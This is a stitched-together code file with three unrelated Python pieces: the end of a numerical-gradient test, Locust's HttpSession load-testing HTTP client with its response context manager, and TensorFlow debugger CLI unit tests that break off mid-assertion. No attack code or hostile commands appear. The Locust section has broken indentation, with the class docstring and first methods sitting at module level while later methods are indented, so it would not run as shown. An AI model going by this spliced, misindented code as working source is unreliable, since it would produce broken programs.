    print('numdiff')
    print(hessnd - 2*np.dot(x.T, x))
    #assert_almost_equal(hessnd, he[0])
    gnd = nd.Gradient(lambda a: fun2(a, y, x))
    gradnd = gnd(xk)
| |
import re
import time
import requests
from requests import Request, Response
from requests.auth import HTTPBasicAuth
from requests.exceptions import InvalidSchema, InvalidURL, MissingSchema, RequestException
from urllib.parse import urlparse, urlunparse
from .exception import CatchResponseError, ResponseError
absolute_http_url_regexp = re.compile(r"^https?://", re.I)
class LocustResponse(Response):
    """Response subclass that can carry a deferred send error.

    The session stores a connection-level exception on ``self.error``; it is
    raised here in preference to the normal HTTP status check.
    """

    def raise_for_status(self):
        deferred_error = getattr(self, "error", None)
        if deferred_error:
            raise deferred_error
        Response.raise_for_status(self)
class HttpSession(requests.Session):
"""
Class for performing web requests and holding (session-) cookies between requests (in order
to be able to log in and out of websites). Each request is logged so that locust can display
statistics.
This is a slightly extended version of `python-request <http://python-requests.org>`_'s
:py:class:`requests.Session` class and mostly this class works exactly the same. However
the methods for making requests (get, post, delete, put, head, options, patch, request)
can now take a *url* argument that's only the path part of the URL, in which case the host
part of the URL will be prepended with the HttpSession.base_url which is normally inherited
from a User class' host property.
Each of the methods for making requests also takes two additional optional arguments which
are Locust specific and doesn't exist in python-requests. These are:
:param name: (optional) An argument that can be specified to use as label in Locust's statistics instead of the URL path.
This can be used to group different URL's that are requested into a single entry in Locust's statistics.
:param catch_response: (optional) Boolean argument that, if set, can be used to make a request return a context manager
to work as argument to a with statement. This will allow the request to be marked as a fail based on the content of the
response, even if the response code is ok (2xx). The opposite also works, one can use catch_response to catch a request
and then mark it as successful even if the response code was not (i.e 500 or 404).
"""
def __init__(self, base_url, request_success, request_failure, *args, **kwargs):
super().__init__(*args, **kwargs)
self.base_url = base_url
self.request_success = request_success
self.request_failure = request_failure
# Check for basic authentication
parsed_url = urlparse(self.base_url)
if parsed_url.username and parsed_url.password:
netloc = parsed_url.hostname
if parsed_url.port:
netloc += ":%d" % parsed_url.port
# remove username and password from the base_url
self.base_url = urlunparse(
(parsed_url.scheme, netloc, parsed_url.path, parsed_url.params, parsed_url.query, parsed_url.fragment)
)
# configure requests to use basic auth
self.auth = HTTPBasicAuth(parsed_url.username, parsed_url.password)
def _build_url(self, path):
""" prepend url with hostname unless it's already an absolute URL """
if absolute_http_url_regexp.match(path):
return path
else:
return "%s%s" % (self.base_url, path)
def request(self, method, url, name=None, catch_response=False, **kwargs):
    """
    Constructs and sends a :py:class:`requests.Request`.
    Returns :py:class:`requests.Response` object.

    :param method: method for the new :class:`Request` object.
    :param url: URL for the new :class:`Request` object.
    :param name: (optional) An argument that can be specified to use as label in Locust's statistics instead of the URL path.
        This can be used to group different URL's that are requested into a single entry in Locust's statistics.
    :param catch_response: (optional) Boolean argument that, if set, can be used to make a request return a context manager
        to work as argument to a with statement. This will allow the request to be marked as a fail based on the content of the
        response, even if the response code is ok (2xx). The opposite also works, one can use catch_response to catch a request
        and then mark it as successful even if the response code was not (i.e 500 or 404).
    :param params: (optional) Dictionary or bytes to be sent in the query string for the :class:`Request`.
    :param data: (optional) Dictionary or bytes to send in the body of the :class:`Request`.
    :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`.
    :param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`.
    :param files: (optional) Dictionary of ``'filename': file-like-objects`` for multipart encoding upload.
    :param auth: (optional) Auth tuple or callable to enable Basic/Digest/Custom HTTP Auth.
    :param timeout: (optional) How long in seconds to wait for the server to send data before giving up, as a float,
        or a (`connect timeout, read timeout <user/advanced.html#timeouts>`_) tuple.
    :type timeout: float or tuple
    :param allow_redirects: (optional) Set to True by default.
    :type allow_redirects: bool
    :param proxies: (optional) Dictionary mapping protocol to the URL of the proxy.
    :param stream: (optional) whether to immediately download the response content. Defaults to ``False``.
    :param verify: (optional) if ``True``, the SSL cert will be verified. A CA_BUNDLE path can also be provided.
    :param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair.
    """
    # prepend url with hostname unless it's already an absolute URL
    url = self._build_url(url)

    # store meta data that is used when reporting the request to locust's statistics
    request_meta = {}

    # set up pre_request hook for attaching meta data to the request object
    request_meta["method"] = method
    request_meta["start_time"] = time.monotonic()

    response = self._send_request_safe_mode(method, url, **kwargs)

    # record the consumed time (milliseconds)
    request_meta["response_time"] = (time.monotonic() - request_meta["start_time"]) * 1000

    # if the request was redirected, report under the originally requested path
    request_meta["name"] = name or (response.history and response.history[0] or response).request.path_url

    # get the length of the content, but if the argument stream is set to True, we take
    # the size from the content-length header, in order to not trigger fetching of the body
    if kwargs.get("stream", False):
        request_meta["content_size"] = int(response.headers.get("content-length") or 0)
    else:
        request_meta["content_size"] = len(response.content or b"")

    if catch_response:
        # success/failure reporting is deferred to the context manager
        response.locust_request_meta = request_meta
        return ResponseContextManager(
            response, request_success=self.request_success, request_failure=self.request_failure
        )
    else:
        if name:
            # Since we use the Exception message when grouping failures, in order to not get
            # multiple failure entries for different URLs for the same name argument, we need
            # to temporarily override the response.url attribute
            orig_url = response.url
            response.url = name

        try:
            response.raise_for_status()
        except RequestException as e:
            self.request_failure.fire(
                request_type=request_meta["method"],
                name=request_meta["name"],
                response_time=request_meta["response_time"],
                response_length=request_meta["content_size"],
                exception=e,
            )
        else:
            self.request_success.fire(
                request_type=request_meta["method"],
                name=request_meta["name"],
                response_time=request_meta["response_time"],
                response_length=request_meta["content_size"],
            )

        if name:
            # restore the real URL now that reporting is done
            response.url = orig_url

        return response
def _send_request_safe_mode(self, method, url, **kwargs):
    """Perform the HTTP request, converting connection-level failures into
    a dummy response object instead of letting them propagate.

    URL/schema errors are re-raised, since they indicate a programming
    mistake in the test script rather than a transient network problem.
    (Requests 1.x removed its built-in "safe mode"; this emulates it.)
    """
    try:
        return super().request(method, url, **kwargs)
    except (MissingSchema, InvalidSchema, InvalidURL):
        # Malformed URLs are bugs -- surface them to the caller.
        raise
    except RequestException as exc:
        # Fabricate a response so callers can treat network failures
        # uniformly with HTTP-level failures.
        fake = LocustResponse()
        fake.error = exc
        fake.status_code = 0  # with this status_code, content returns None
        fake.request = Request(method, url).prepare()
        return fake
class ResponseContextManager(LocustResponse):
    """
    A Response class that also acts as a context manager that provides the ability to manually
    control if an HTTP request should be marked as successful or a failure in Locust's statistics

    This class is a subclass of :py:class:`Response <requests.Response>` with two additional
    methods: :py:meth:`success <locust.clients.ResponseContextManager.success>` and
    :py:meth:`failure <locust.clients.ResponseContextManager.failure>`.
    """

    # Set by success()/failure(); None means "let the status code decide".
    _manual_result = None

    def __init__(self, response, request_success, request_failure):
        # copy data from response to this object (shares the response's state
        # rather than re-fetching anything)
        self.__dict__ = response.__dict__
        self._request_success = request_success
        self._request_failure = request_failure

    def __enter__(self):
        return self

    def __exit__(self, exc, value, traceback):
        # A manual verdict (via success()/failure()) takes precedence over
        # both the HTTP status code and any ResponseError raised in the block.
        if self._manual_result is not None:
            if self._manual_result is True:
                self._report_success()
            elif isinstance(self._manual_result, Exception):
                self._report_failure(self._manual_result)

            # if the user has already manually marked this response as failure or success
            # we can ignore the default behaviour of letting the response code determine the outcome
            return exc is None

        if exc:
            if isinstance(value, ResponseError):
                self._report_failure(value)
            else:
                # we want other unknown exceptions to be raised
                return False
        else:
            try:
                self.raise_for_status()
            except requests.exceptions.RequestException as e:
                self._report_failure(e)
            else:
                self._report_success()

        # Returning True suppresses a ResponseError raised in the with-block;
        # it has already been recorded as a failure above.
        return True

    def _report_success(self):
        # Fire the success event using the meta data attached by HttpSession.request().
        self._request_success.fire(
            request_type=self.locust_request_meta["method"],
            name=self.locust_request_meta["name"],
            response_time=self.locust_request_meta["response_time"],
            response_length=self.locust_request_meta["content_size"],
        )

    def _report_failure(self, exc):
        # Fire the failure event, including the triggering exception.
        self._request_failure.fire(
            request_type=self.locust_request_meta["method"],
            name=self.locust_request_meta["name"],
            response_time=self.locust_request_meta["response_time"],
            response_length=self.locust_request_meta["content_size"],
            exception=exc,
        )

    def success(self):
        """
        Report the response as successful

        Example::

            with self.client.get("/does/not/exist", catch_response=True) as response:
                if response.status_code == 404:
                    response.success()
        """
        self._manual_result = True

    def failure(self, exc):
        """
        Report the response as a failure.

        if exc is anything other than a python exception (like a string) it will
        be wrapped inside a CatchResponseError.

        Example::

            with self.client.get("/", catch_response=True) as response:
                if response.content == b"":
                    response.failure("No data")
        """
        if not isinstance(exc, Exception):
            exc = CatchResponseError(exc)
        self._manual_result = exc
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Building Blocks of the TensorFlow Debugger CLI."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import stat
import tempfile
import numpy as np
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.debug.cli import debugger_cli_common
from tensorflow.python.framework import test_util
from tensorflow.python.platform import gfile
from tensorflow.python.platform import googletest
class CommandLineExitTest(test_util.TensorFlowTestCase):
  """Tests for the CommandLineExit exception type."""

  def testConstructionWithoutToken(self):
    exit_exc = debugger_cli_common.CommandLineExit()

    # CommandLineExit must be an Exception so that it can be raised and
    # caught by the CLI loop. assertIsInstance gives a clearer failure
    # message than assertTrue(isinstance(...)).
    self.assertIsInstance(exit_exc, Exception)

  def testConstructionWithToken(self):
    exit_exc = debugger_cli_common.CommandLineExit(exit_token={"foo": "bar"})

    self.assertIsInstance(exit_exc, Exception)
    # The exit token must ride along on the exception unchanged.
    self.assertEqual({"foo": "bar"}, exit_exc.exit_token)
class RichTextLinesTest(test_util.TensorFlowTestCase):
  """Tests for the RichTextLines screen-output data structure."""

  def testRichTextLinesConstructorComplete(self):
    # Test RichTextLines constructor with all keyword arguments supplied.
    screen_output = debugger_cli_common.RichTextLines(
        ["Roses are red", "Violets are blue"],
        font_attr_segs={0: [(0, 5, "red")],
                        1: [(0, 7, "blue")]},
        annotations={0: "longer wavelength",
                     1: "shorter wavelength"})

    self.assertEqual(2, len(screen_output.lines))
    self.assertEqual(2, len(screen_output.font_attr_segs))
    self.assertEqual(1, len(screen_output.font_attr_segs[0]))
    self.assertEqual(1, len(screen_output.font_attr_segs[1]))
    self.assertEqual(2, len(screen_output.annotations))

    self.assertEqual(2, screen_output.num_lines())

  def testRichTextLinesConstructorWithInvalidType(self):
    with self.assertRaisesRegexp(ValueError, "Unexpected type in lines"):
      debugger_cli_common.RichTextLines(123)

  def testRichTextLinesConstructorWithString(self):
    # Test constructing a RichTextLines object with a string, instead of a list
    # of strings.
    screen_output = debugger_cli_common.RichTextLines(
        "Roses are red",
        font_attr_segs={0: [(0, 5, "red")]},
        annotations={0: "longer wavelength"})

    self.assertEqual(1, len(screen_output.lines))
    self.assertEqual(1, len(screen_output.font_attr_segs))
    self.assertEqual(1, len(screen_output.font_attr_segs[0]))
    self.assertEqual(1, len(screen_output.annotations))

  def testRichLinesAppendRichLine(self):
    rtl = debugger_cli_common.RichTextLines(
        "Roses are red",
        font_attr_segs={0: [(0, 5, "red")]})
    rtl.append_rich_line(debugger_cli_common.RichLine("Violets are ") +
                         debugger_cli_common.RichLine("blue", "blue"))

    self.assertEqual(2, len(rtl.lines))
    self.assertEqual(2, len(rtl.font_attr_segs))
    self.assertEqual(1, len(rtl.font_attr_segs[0]))
    self.assertEqual(1, len(rtl.font_attr_segs[1]))

  def testRichLineLenMethodWorks(self):
    self.assertEqual(0, len(debugger_cli_common.RichLine()))
    self.assertEqual(0, len(debugger_cli_common.RichLine("")))
    self.assertEqual(1, len(debugger_cli_common.RichLine("x")))
    self.assertEqual(6, len(debugger_cli_common.RichLine("x y z ", "blue")))

  def testRichTextLinesConstructorIncomplete(self):
    # Test RichTextLines constructor, with incomplete keyword arguments.
    screen_output = debugger_cli_common.RichTextLines(
        ["Roses are red", "Violets are blue"],
        font_attr_segs={0: [(0, 5, "red")],
                        1: [(0, 7, "blue")]})

    self.assertEqual(2, len(screen_output.lines))
    self.assertEqual(2, len(screen_output.font_attr_segs))
    self.assertEqual(1, len(screen_output.font_attr_segs[0]))
    self.assertEqual(1, len(screen_output.font_attr_segs[1]))
    # An omitted annotations argument defaults to an empty dict.
    self.assertEqual({}, screen_output.annotations)

  def testModifyRichTextLinesObject(self):
    screen_output = debugger_cli_common.RichTextLines(
        ["Roses are red", "Violets are blue"])

    self.assertEqual(2, len(screen_output.lines))

    # The lines list must be mutable in place.
    screen_output.lines.append("Sugar is sweet")
    self.assertEqual(3, len(screen_output.lines))

  def testMergeRichTextLines(self):
    screen_output_1 = debugger_cli_common.RichTextLines(
        ["Roses are red", "Violets are blue"],
        font_attr_segs={0: [(0, 5, "red")],
                        1: [(0, 7, "blue")]},
        annotations={0: "longer wavelength",
                     1: "shorter wavelength"})
    screen_output_2 = debugger_cli_common.RichTextLines(
        ["Lilies are white", "Sunflowers are yellow"],
        font_attr_segs={0: [(0, 6, "white")],
                        1: [(0, 7, "yellow")]},
        annotations={
            "metadata": "foo",
            0: "full spectrum",
            1: "medium wavelength"
        })

    screen_output_1.extend(screen_output_2)

    self.assertEqual(4, screen_output_1.num_lines())
    self.assertEqual([
        "Roses are red", "Violets are blue", "Lilies are white",
        "Sunflowers are yellow"
    ], screen_output_1.lines)
    # Row indices of the extending object's font_attr_segs and annotations
    # must be shifted past the end of the original lines; non-integer keys
    # (e.g. "metadata") are carried over as-is.
    self.assertEqual({
        0: [(0, 5, "red")],
        1: [(0, 7, "blue")],
        2: [(0, 6, "white")],
        3: [(0, 7, "yellow")]
    }, screen_output_1.font_attr_segs)
    self.assertEqual({
        "metadata": "foo",
        0: "longer wavelength",
        1: "shorter wavelength",
        2: "full spectrum",
        3: "medium wavelength"
    }, screen_output_1.annotations)

  def testMergeRichTextLinesEmptyOther(self):
    screen_output_1 = debugger_cli_common.RichTextLines(
        ["Roses are red", "Violets are blue"],
        font_attr_segs={0: [(0, 5, "red")],
                        1: [(0, 7, "blue")]},
        annotations={0: "longer wavelength",
                     1: "shorter wavelength"})
    screen_output_2 = debugger_cli_common.RichTextLines([])

    # Extending with an empty object must leave everything unchanged.
    screen_output_1.extend(screen_output_2)

    self.assertEqual(2, screen_output_1.num_lines())
    self.assertEqual(["Roses are red", "Violets are blue"],
                     screen_output_1.lines)
    self.assertEqual({
        0: [(0, 5, "red")],
        1: [(0, 7, "blue")],
    }, screen_output_1.font_attr_segs)
    self.assertEqual({
        0: "longer wavelength",
        1: "shorter wavelength",
    }, screen_output_1.annotations)

  def testMergeRichTextLinesEmptySelf(self):
    screen_output_1 = debugger_cli_common.RichTextLines([])
    screen_output_2 = debugger_cli_common.RichTextLines(
        ["Roses are red", "Violets are blue"],
        font_attr_segs={0: [(0, 5, "red")],
                        1: [(0, 7, "blue")]},
        annotations={0: "longer wavelength",
                     1: "shorter wavelength"})

    # Extending an empty object must adopt the other's content verbatim.
    screen_output_1.extend(screen_output_2)

    self.assertEqual(2, screen_output_1.num_lines())
    self.assertEqual(["Roses are red", "Violets are blue"],
                     screen_output_1.lines)
    self.assertEqual({
        0: [(0, 5, "red")],
        1: [(0, 7, "blue")],
    }, screen_output_1.font_attr_segs)
    self.assertEqual({
        0: "longer wavelength",
        1: "shorter wavelength",
    }, screen_output_1.annotations)

  def testAppendALineWithAttributeSegmentsWorks(self):
    screen_output_1 = debugger_cli_common.RichTextLines(
        ["Roses are red"],
        font_attr_segs={0: [(0, 5, "red")]},
        annotations={0: "longer wavelength"})

    screen_output_1.append("Violets are blue", [(0, 7, "blue")])

    self.assertEqual(["Roses are red", "Violets are blue"],
                     screen_output_1.lines)
    self.assertEqual({
        0: [(0, 5, "red")],
        1: [(0, 7, "blue")],
    }, screen_output_1.font_attr_segs)

  def testPrependALineWithAttributeSegmentsWorks(self):
    screen_output_1 = debugger_cli_common.RichTextLines(
        ["Roses are red"],
        font_attr_segs={0: [(0, 5, "red")]},
        annotations={0: "longer wavelength"})

    screen_output_1.prepend("Violets are blue", font_attr_segs=[(0, 7, "blue")])

    self.assertEqual(["Violets are blue", "Roses are red"],
                     screen_output_1.lines)
    # Prepending must shift existing font_attr_segs down by one row.
    self.assertEqual({
        0: [(0, 7, "blue")],
        1: [(0, 5, "red")],
    }, screen_output_1.font_attr_segs)

  def testWriteToFileSucceeds(self):
    screen_output = debugger_cli_common.RichTextLines(
        ["Roses are red", "Violets are blue"],
        font_attr_segs={0: [(0, 5, "red")],
                        1: [(0, 7, "blue")]})

    # Use mkdtemp() instead of the deprecated, race-prone tempfile.mktemp().
    file_path = os.path.join(tempfile.mkdtemp(), "rich_text_lines.txt")
    screen_output.write_to_file(file_path)

    # Only the plain text is written; font attributes are not serialized.
    with gfile.Open(file_path, "r") as f:
      self.assertEqual("Roses are red\nViolets are blue\n", f.read())

    # Clean up.
    gfile.Remove(file_path)

  def testAttemptToWriteToADirectoryFails(self):
    screen_output = debugger_cli_common.RichTextLines(
        ["Roses are red", "Violets are blue"],
        font_attr_segs={0: [(0, 5, "red")],
                        1: [(0, 7, "blue")]})

    with self.assertRaises(Exception):
      screen_output.write_to_file("/")

  def testAttemptToWriteToFileInNonexistentDirectoryFails(self):
    screen_output = debugger_cli_common.RichTextLines(
        ["Roses are red", "Violets are blue"],
        font_attr_segs={0: [(0, 5, "red")],
                        1: [(0, 7, "blue")]})

    file_path = os.path.join(tempfile.mkdtemp(), "foo", "bar.txt")
    with self.assertRaises(Exception):
      screen_output.write_to_file(file_path)
class CommandHandlerRegistryTest(test_util.TensorFlowTestCase):
  """Tests for debugger_cli_common.CommandHandlerRegistry."""

  def setUp(self):
    # Message raised by the intentionally-failing handler below, so tests can
    # verify it surfaces in the wrapped error output.
    self._intentional_error_msg = "Intentionally raised exception"

  def _noop_handler(self, argv, screen_info=None):
    # A handler that does nothing other than returning "Done."
    return debugger_cli_common.RichTextLines(["Done."])

  def _handler_raising_exception(self, argv, screen_info=None):
    # A handler that intentionally raises an exception.
    raise RuntimeError(self._intentional_error_msg)

  def _handler_returning_wrong_type(self, argv, screen_info=None):
    # A handler that returns a wrong type, instead of the correct type
    # (RichTextLines).
    return "Hello"

  def _echo_screen_cols(self, argv, screen_info=None):
    # A handler that uses screen_info.
    return debugger_cli_common.RichTextLines(
        ["cols = %d" % screen_info["cols"]])

  def _exiting_handler(self, argv, screen_info=None):
    """A handler that exits with an exit token."""
    if argv:
      exit_token = argv[0]
    else:
      exit_token = None
    raise debugger_cli_common.CommandLineExit(exit_token=exit_token)

  def testRegisterEmptyCommandPrefix(self):
    registry = debugger_cli_common.CommandHandlerRegistry()

    # Attempt to register an empty-string as a command prefix should trigger
    # an exception.
    with self.assertRaisesRegexp(ValueError, "Empty command prefix"):
      registry.register_command_handler("", self._noop_handler, "")

  def testRegisterAndInvokeHandler(self):
    registry = debugger_cli_common.CommandHandlerRegistry()
    registry.register_command_handler("noop", self._noop_handler, "")

    self.assertTrue(registry.is_registered("noop"))
    self.assertFalse(registry.is_registered("beep"))

    cmd_output = registry.dispatch_command("noop", [])
    self.assertEqual(["Done."], cmd_output.lines)

    # Attempt to invoke an unregistered command prefix should trigger an
    # exception.
    with self.assertRaisesRegexp(ValueError, "No handler is registered"):
      registry.dispatch_command("beep", [])

    # Empty command prefix should trigger an exception.
    with self.assertRaisesRegexp(ValueError, "Prefix is empty"):
      registry.dispatch_command("", [])

  def testExitingHandler(self):
    """Test that exit exception is correctly raised."""
    registry = debugger_cli_common.CommandHandlerRegistry()
    registry.register_command_handler("exit", self._exiting_handler, "")

    self.assertTrue(registry.is_registered("exit"))

    exit_token = None
    try:
      registry.dispatch_command("exit", ["foo"])
    except debugger_cli_common.CommandLineExit as e:
      exit_token = e.exit_token

    # The token passed as argv[0] must ride along on the exception.
    self.assertEqual("foo", exit_token)

  def testInvokeHandlerWithScreenInfo(self):
    registry = debugger_cli_common.CommandHandlerRegistry()

    # Register and invoke a command handler that uses screen_info.
    registry.register_command_handler("cols", self._echo_screen_cols, "")

    cmd_output = registry.dispatch_command(
        "cols", [], screen_info={"cols": 100})
    self.assertEqual(["cols = 100"], cmd_output.lines)

  def testRegisterAndInvokeHandlerWithAliases(self):
    registry = debugger_cli_common.CommandHandlerRegistry()
    registry.register_command_handler(
        "noop", self._noop_handler, "", prefix_aliases=["n", "NOOP"])

    # is_registered() should work for full prefix and aliases.
    self.assertTrue(registry.is_registered("noop"))
    self.assertTrue(registry.is_registered("n"))
    self.assertTrue(registry.is_registered("NOOP"))

    cmd_output = registry.dispatch_command("n", [])
    self.assertEqual(["Done."], cmd_output.lines)

    cmd_output = registry.dispatch_command("NOOP", [])
    self.assertEqual(["Done."], cmd_output.lines)

  def testHandlerWithWrongReturnType(self):
    registry = debugger_cli_common.CommandHandlerRegistry()
    registry.register_command_handler("wrong_return",
                                      self._handler_returning_wrong_type, "")

    # If the command handler fails to return a RichTextLines instance, an error
    # should be triggered.
    with self.assertRaisesRegexp(
        ValueError,
        "Return value from command handler.*is not None or a RichTextLines "
        "instance"):
      registry.dispatch_command("wrong_return", [])

  def testRegisterDuplicateHandlers(self):
    registry = debugger_cli_common.CommandHandlerRegistry()
    registry.register_command_handler("noop", self._noop_handler, "")

    # Registering the same command prefix more than once should trigger an
    # exception.
    with self.assertRaisesRegexp(
        ValueError, "A handler is already registered for command prefix"):
      registry.register_command_handler("noop", self._noop_handler, "")

    # The original registration must remain intact after the failed attempt.
    cmd_output = registry.dispatch_command("noop", [])
    self.assertEqual(["Done."], cmd_output.lines)

  def testRegisterDuplicateAliases(self):
    registry = debugger_cli_common.CommandHandlerRegistry()
    registry.register_command_handler(
        "noop", self._noop_handler, "", prefix_aliases=["n"])

    # Clash with existing alias.
    with self.assertRaisesRegexp(ValueError,
                                 "clashes with existing prefixes or aliases"):
      registry.register_command_handler(
          "cols", self._echo_screen_cols, "", prefix_aliases=["n"])

    # The name clash should have prevented the handler from being registered.
    self.assertFalse(registry.is_registered("cols"))

    # Aliases can also clash with command prefixes.
    with self.assertRaisesRegexp(ValueError,
                                 "clashes with existing prefixes or aliases"):
      registry.register_command_handler(
          "cols", self._echo_screen_cols, "", prefix_aliases=["noop"])

    self.assertFalse(registry.is_registered("cols"))

  def testDispatchHandlerRaisingException(self):
    registry = debugger_cli_common.CommandHandlerRegistry()
    registry.register_command_handler("raise_exception",
                                      self._handler_raising_exception, "")

    # The registry should catch and wrap exceptions that occur during command
    # handling.
    cmd_output = registry.dispatch_command("raise_exception", [])

    # The error output contains a stack trace.
    # So the line count should be >= 2.
    self.assertGreater(len(cmd_output.lines), 2)
    self.assertTrue(cmd_output.lines[0].startswith(
        "Error occurred during handling of command"))
    self.assertTrue(cmd_output.lines[1].endswith(self._intentional_error_msg))

  def testRegisterNonCallableHandler(self):
    registry = debugger_cli_common.CommandHandlerRegistry()

    # Attempt to register a non-callable handler should fail.
    with self.assertRaisesRegexp(ValueError, "handler is not callable"):
      registry.register_command_handler("non_callable", 1, "")

  def testRegisterHandlerWithInvalidHelpInfoType(self):
    registry = debugger_cli_common.CommandHandlerRegistry()

    with self.assertRaisesRegexp(ValueError, "help_info is not a str"):
      registry.register_command_handler("noop", self._noop_handler, ["foo"])

  def testGetHelpFull(self):
    registry = debugger_cli_common.CommandHandlerRegistry()
    registry.register_command_handler(
        "noop",
        self._noop_handler,
        "No operation.\nI.e., do nothing.",
        prefix_aliases=["n", "NOOP"])
    registry.register_command_handler(
        "cols",
        self._echo_screen_cols,
        "Show screen width in number of columns.",
        prefix_aliases=["c"])

    help_lines = registry.get_help().lines

    # The help info should list commands in alphabetically sorted order,
    # regardless of order in which the commands are registered.
    self.assertEqual("cols", help_lines[0])
    self.assertTrue(help_lines[1].endswith("Aliases: c"))
    self.assertFalse(help_lines[2])
    self.assertTrue(help_lines[3].endswith(
        "Show screen width in number of columns."))
    self.assertFalse(help_lines[4])
    self.assertFalse(help_lines[5])

    # The default help command should appear in the help output.
    self.assertEqual("help", help_lines[6])

    self.assertEqual("noop", help_lines[12])
    self.assertTrue(help_lines[13].endswith("Aliases: n, NOOP"))
    self.assertFalse(help_lines[14])
    self.assertTrue(help_lines[15].endswith("No operation."))
    self.assertTrue(help_lines[16].endswith("I.e., do nothing."))

  def testGetHelpSingleCommand(self):
    registry = debugger_cli_common.CommandHandlerRegistry()
    registry.register_command_handler(
        "noop",
        self._noop_handler,
        "No operation.\nI.e., do nothing.",
        prefix_aliases=["n", "NOOP"])
    registry.register_command_handler(
        "cols",
        self._echo_screen_cols,
        "Show screen width in number of columns.",
        prefix_aliases=["c"])

    # Get help info for one of the two commands, using full prefix.
    help_lines = registry.get_help("cols").lines

    self.assertTrue(help_lines[0].endswith("cols"))
    self.assertTrue(help_lines[1].endswith("Aliases: c"))
    self.assertFalse(help_lines[2])
    self.assertTrue(help_lines[3].endswith(
        "Show screen width in number of columns."))

    # Get help info for one of the two commands, using alias.
    help_lines = registry.get_help("c").lines

    self.assertTrue(help_lines[0].endswith("cols"))
    self.assertTrue(help_lines[1].endswith("Aliases: c"))
    self.assertFalse(help_lines[2])
    self.assertTrue(help_lines[3].endswith(
        "Show screen width in number of columns."))

    # Get help info for a nonexistent command.
    help_lines = registry.get_help("foo").lines

    self.assertEqual("Invalid command prefix: \"foo\"", help_lines[0])

  def testHelpCommandWithoutIntro(self):
    registry = debugger_cli_common.CommandHandlerRegistry()
    registry.register_command_handler(
        "noop",
        self._noop_handler,
        "No operation.\nI.e., do nothing.",
        prefix_aliases=["n", "NOOP"])
    registry.register_command_handler(
        "cols",
        self._echo_screen_cols,
        "Show screen width in number of columns.",
        prefix_aliases=["c"])

    # Get help for all commands.
    output = registry.dispatch_command("help", [])
    self.assertEqual(["cols", "  Aliases: c", "",
                      "  Show screen width in number of columns.", "", "",
                      "help", "  Aliases: h", "", "  Print this help message.",
                      "", "", "noop", "  Aliases: n, NOOP", "",
                      "  No operation.", "  I.e., do nothing.", "", "",
                      "version", "  Aliases: ver", "",
                      "  Print the versions of TensorFlow and its key "
                      "dependencies.", "", ""],
                     output.lines)

    # Get help for one specific command prefix.
    output = registry.dispatch_command("help", ["noop"])
    self.assertEqual(["noop", "  Aliases: n, NOOP", "", "  No operation.",
                      "  I.e., do nothing."], output.lines)

    # Get help for a nonexistent command prefix.
    output = registry.dispatch_command("help", ["foo"])
    self.assertEqual(["Invalid command prefix: \"foo\""], output.lines)

  def testHelpCommandWithIntro(self):
    registry = debugger_cli_common.CommandHandlerRegistry()
    registry.register_command_handler(
        "noop",
        self._noop_handler,
        "No operation.\nI.e., do nothing.",
        prefix_aliases=["n", "NOOP"])

    # A configured intro must be prepended to the full help output.
    help_intro = debugger_cli_common.RichTextLines(
        ["Introductory comments.", ""])
    registry.set_help_intro(help_intro)

    output = registry.dispatch_command("help", [])
    self.assertEqual(help_intro.lines + [
        "help", "  Aliases: h", "", "  Print this help message.", "", "",
        "noop", "  Aliases: n, NOOP", "", "  No operation.",
        "  I.e., do nothing.", "", "",
        "version", "  Aliases: ver", "",
        "  Print the versions of TensorFlow and its key dependencies.", "", ""
    ], output.lines)
class RegexFindTest(test_util.TensorFlowTestCase):
  """Tests for regex-based highlighting via debugger_cli_common.regex_find."""

  def setUp(self):
    self._orig_screen_output = debugger_cli_common.RichTextLines(
        ["Roses are red", "Violets are blue"])

  def testRegexFindWithoutExistingFontAttrSegs(self):
    highlighted = debugger_cli_common.regex_find(
        self._orig_screen_output, "are", "yellow")

    # Every occurrence of "are" receives a yellow attribute segment.
    self.assertEqual(2, len(highlighted.font_attr_segs))
    self.assertEqual([(6, 9, "yellow")], highlighted.font_attr_segs[0])
    self.assertEqual([(8, 11, "yellow")], highlighted.font_attr_segs[1])

    # The annotations carry the list of matching line indices.
    self.assertEqual(
        [0, 1],
        highlighted.annotations[debugger_cli_common.REGEX_MATCH_LINES_KEY])

  def testRegexFindWithExistingFontAttrSegs(self):
    # Seed line 0 with a pre-existing attribute segment first.
    self._orig_screen_output.font_attr_segs[0] = [(9, 12, "red")]
    self.assertEqual(1, len(self._orig_screen_output.font_attr_segs))

    highlighted = debugger_cli_common.regex_find(
        self._orig_screen_output, "are", "yellow")

    # The new match segment is merged with the pre-existing one.
    self.assertEqual(2, len(highlighted.font_attr_segs))
    self.assertEqual([(6, 9, "yellow"), (9, 12, "red")],
                     highlighted.font_attr_segs[0])
    self.assertEqual(
        [0, 1],
        highlighted.annotations[debugger_cli_common.REGEX_MATCH_LINES_KEY])

  def testRegexFindWithNoMatches(self):
    highlighted = debugger_cli_common.regex_find(
        self._orig_screen_output, "infrared", "yellow")

    self.assertEqual({}, highlighted.font_attr_segs)
    self.assertEqual(
        [],
        highlighted.annotations[debugger_cli_common.REGEX_MATCH_LINES_KEY])

  def testInvalidRegex(self):
    with self.assertRaisesRegexp(ValueError, "Invalid regular expression"):
      debugger_cli_common.regex_find(self._orig_screen_output, "[", "yellow")

  def testRegexFindOnPrependedLinesWorks(self):
    rich_lines = debugger_cli_common.RichTextLines(["Violets are blue"])
    rich_lines.prepend(["Roses are red"])

    searched = debugger_cli_common.regex_find(rich_lines, "red", "bold")
    self.assertEqual({0: [(10, 13, "bold")]}, searched.font_attr_segs)

    # Prepended lines with their own attributes keep them after the search.
    rich_lines = debugger_cli_common.RichTextLines(["Violets are blue"])
    rich_lines.prepend(["A poem"], font_attr_segs=[(0, 1, "underline")])

    searched = debugger_cli_common.regex_find(rich_lines, "poem", "italic")
    self.assertEqual({0: [(0, 1, "underline"), (2, 6, "italic")]},
